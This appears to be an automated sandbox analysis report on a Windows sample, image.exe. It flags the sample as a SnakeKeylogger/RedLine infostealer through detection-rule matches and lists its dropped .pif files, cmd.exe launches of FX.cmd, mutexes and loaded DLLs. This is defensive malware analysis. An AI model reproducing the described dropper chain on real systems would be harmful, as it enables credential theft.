Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000001.1913774017.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.2945858419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, -j.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: image.exe, Pumyophn.PIF.0.dr

Binary or memory string: oW.Sln

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/8@5/5

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02C97F52 GetDiskFreeSpaceA,

0_2_02C97F52

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

3_2_004019F0

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02CA6D48 CoCreateInstance,

0_2_02CA6D48

Source: C:\Users\Public\Libraries\nhpoymuP.pif

3_2_004019F0

Source: C:\Users\user\Desktop\image.exe

File created: C:\Users\Public\PumyophnF.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	3_2_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	3_2_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	3_1_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	7_1_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	14_2_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	14_2_00413780
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Command line argument: 08A	14_1_00413780

Source: C:\Users\user\Desktop\image.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\image.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: image.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\image.exe

File read: C:\Users\user\Desktop\image.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\image.exe "C:\Users\user\Desktop\image.exe"
Source: C:\Users\user\Desktop\image.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\image.exe	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Pumyophn.PIF "C:\Users\Public\Libraries\Pumyophn.PIF"
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Pumyophn.PIF "C:\Users\Public\Libraries\Pumyophn.PIF"
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif
Source: C:\Users\user\Desktop\image.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Process created: C:\Users\Public\Libraries\nhpoymuP.pif C:\Users\Public\Libraries\nhpoymuP.pif

Source: C:\Users\user\Desktop\image.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\image.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: wintypes.dll	Jump to behavior
